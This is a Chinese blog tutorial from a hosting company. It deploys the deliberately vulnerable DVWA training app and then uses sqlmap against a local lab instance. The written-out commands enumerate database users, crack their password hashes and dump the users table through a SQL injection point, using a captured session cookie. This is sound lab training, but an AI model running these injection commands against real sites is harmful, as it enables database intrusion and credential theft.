重庆分公司,新征程启航

为企业提供网站建设、域名注册、服务器等服务

测试演练系统DVWA流程-创新互联

下文内容主要给大家带来测试演练系统DVWA流程,这里所讲到的知识,与书籍略有不同,都是创新互联专业技术人员在与用户接触过程中,总结出来的,具有一定的经验分享价值,希望给广大读者带来帮助。

创新互联公司是一家专注于网站设计、成都网站建设与策划设计,铜陵网站建设哪家好?创新互联公司做网站,专注于网站建设10余年,网设计领域的专业建站公司;建站业务涵盖:铜陵等地区。铜陵做网站价格咨询:028-86922220

一、部署***测试演练系统DVWA

1. 下载DVWA软件包

  官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9

  wgethttps://codeload.github.com/ethicalhack3r/DVWA/zip/master

2. 部署linux环境

  yum install -y httpd mysql mysql-server php php-mysql php-gd

3. 开启httpd和mysqld服务

  service httpd start

  service mysqld start

测试演练系统DVWA流程

4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常

  vim /var/www/html/test.php

  写入:

  

   phpinfo();

  ?>

5. 修改mysql的密码

   mysqladmin -uroot password "123456"

6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache

   unzip DVWA-1.9.zip -d /var/www/html

  chown -R apache:apache /var/www/html/DVWA-1.9

7. 修改DVWA配置文件数据库密码为123456

  vim /var/www/html/DVWA-1.9/config/config.inc.php

  修改密码:

  $_DVWA[ 'db_password' ] = '123456';

 测试演练系统DVWA流程

8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错

 测试演练系统DVWA流程

  解决方法:

  1)编辑php的配置文件 vim /etc/php.ini

    allow_url_include = On

 测试演练系统DVWA流程

  2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

    找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:

    公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

         私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 测试演练系统DVWA流程

测试演练系统DVWA流程

测试演练系统DVWA流程

9. 重启http,使修改的配置文件生效,刷新web界面,错误消除

  service httpd restart

 测试演练系统DVWA流程

10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password

   至此,DVWA已部署完成

    测试演练系统DVWA流程

二、安装SQLmap漏洞查看工具

1. 官方下载:http://sqlmap.org/http://sqlmap.org/

   版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

2.  解压sqlmap,并执行

   说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行

   测试演练系统DVWA流程

   命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

   命令 ./sqlmap.py

    测试演练系统DVWA流程

3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令

   命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

   命令 source /etc/profile

    测试演练系统DVWA流程

三、实战

    实战1:枚举登录MYSQL数据的用户名与密码

    实战2:枚举所有数据库

    实战3:枚举指定数据库的数据表

    实战4:获取指定数据库和表中所有列的信息

    实战5:枚举指定数据表中的所有用户名与密码

    环境准备:

    1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;

    2)开启Firefox浏览器TamperData插件,等待获取cookies值;

    3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

       获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

    4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552

测试演练系统DVWA流程

测试演练系统DVWA流程

实战1:枚举登录MYSQL数据的用户名与密码

  sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' -b  --current-db  --current-user

说明:根据提示回复Y,继续

测试演练系统DVWA流程

结果:得到当前数据库为dawa,使用的用户为root@localhost

测试演练系统DVWA流程

实战2:枚举所有数据库

  sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --users --password

测试演练系统DVWA流程

说明:选择目录下字典文件,暴力破解

测试演练系统DVWA流程

结果:数据库用户名为root,密码也有明文形式123456

测试演练系统DVWA流程

实战3:枚举数据库和指定数据库的数据表

  sqlmap语法参数:

  • --dbs:枚举当前数据库

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --dbs

结果:mysql下所有的数据库

测试演练系统DVWA流程

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa --tables

结果:dvwa库中,所有的表

测试演练系统DVWA流程

实战4:获取指定数据库和表中所有列的信息

  sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users --columns

结果:dvwa库,users表中所有字段信息

测试演练系统DVWA流程

实战5:枚举指定数据表中的所有用户名与密码

  sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump

结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

测试演练系统DVWA流程

对于以上关于测试演练系统DVWA流程,如果大家还有更多需要了解的可以持续关注我们创新互联的行业推新,如需获取专业解答,可在官网联系售前售后的,希望该文章可给大家带来一定的知识更新。

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


当前名称:测试演练系统DVWA流程-创新互联
路径分享:http://cqcxhl.com/article/jphhg.html

其他资讯

在线咨询
服务热线
服务热线:028-86922220
TOP